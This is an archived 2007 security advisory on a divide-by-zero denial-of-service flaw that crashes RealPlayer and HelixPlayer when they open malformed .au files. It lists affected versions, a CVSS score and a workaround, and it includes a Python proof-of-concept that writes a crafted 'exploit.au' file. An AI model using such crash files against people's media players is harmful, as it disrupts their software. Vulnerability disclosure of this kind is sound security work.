Home / exploits OS2A_1010.txt
Posted on 12 September 2007
RealPlayer/HelixPlayer .au Divide-By-Zero Denial of Service Vulnerability OS2A ID: OS2A_1010 08/21/2007 Issue Discovered 08/31/2007 Vendor Notification Class: Denial of Service Severity: High Overview: ------------- RealPlayer/Helix Player is a media player that will play popular media formats as well as organize your music and videos. Description: -------------- A Denial of Service flaw exists in RealPlayer and HelixPlayer, when a user tries to open a malformed .au file. The flaw is due to a Division by Zero error when processing a malformed AU file. An attacker must entice an unsuspecting user to open a maliciously crafted AU file. Impact: -------- Successful exploitation allows an attacker to crash a vulnerable application via a specially crafted file. (Deny the service). Affected Software(s): --------------------- Realplayer 10.1.0.3114 and prior Helixplayer Tested on : - RealPlayer-10.1.0.3114 - Realplayer-10.0.9 - Realplayer-10.0.8 on FC6, RH9, RHEL and SuSE respectively - Realplayer10-5Gold on Windows XP - HelixPlayer-1.0.6.778 on FC6 AV MP3 Player and Media Player Classic are also found to be vulnerable Affected Platform: ------------------ Microsoft Windows (All Platform) RedHat Linux Fedora Core Linux SuSE Linux Proof of Concept: ------------------ The following Python program will generate a malformed .au file import sys import os head = ("x2Ex73x6Ex64x00x00x01x18x02x01x42xDCx00x00x00x01"+ "x02x02x1Fx40x00x00x00x00x00" + "x31x00x00x00x01x02x00x00x00x00x00x00x00x00x00x00"+ "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"+ "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"+ "x00x00x00x00x00x00x00x00x66x66x66x00") print "[x] RealPlayer/Helix Player/Kaboodle Player DoS" try: f = open("exploit.au",'w') except IOError, e: print "Unable to open file ", e sys.exit(0) print "[x] File successfully opened for writing." try: f.write(head) except IOError, e: print "Unable to write to file ", e sys.exit(0) print "[x] File successfully written." f.close() print "[x] Open exploit.au with RealPlayer/Helix/Kaboodle Players." #End of program RealPlayer crashes with the following exception, Floating point exception$REALPLAYBIN "$@" CVSS Score Report: ------------------ ACCESS_VECTOR = NETWORK ACCESS_COMPLEXITY = MEDIUM AUTHENTICATION = NOT_REQUIRED CONFIDENTIALITY_IMPACT = NONE INTEGRITY_IMPACT = NONE AVAILABILITY_IMPACT = COMPLETE EXPLOITABILITY = PROOF_OF_CONCEPT REMEDIATION_LEVEL = UNAVAILABLE REPORT_CONFIDENCE = CONFIRMED CVSS Base Score = 7.1 (AV:N/AC:M/Au:NR/C:N/I:N/A:C) CVSS Temporal Score = 6.4 Risk factor = High Reference: ----------- A similar attack was found recently against Windows Media Player, http://www.safehack.com/exp/mp/mplayer11.txt Solution/Work Around: -------------------- Do not open untrusted .au files. Credits: -------- Nagendra Kumar G, Chandan S and Arun Kethipelly of OS2A have been credited with the discovery of this vulnerability.
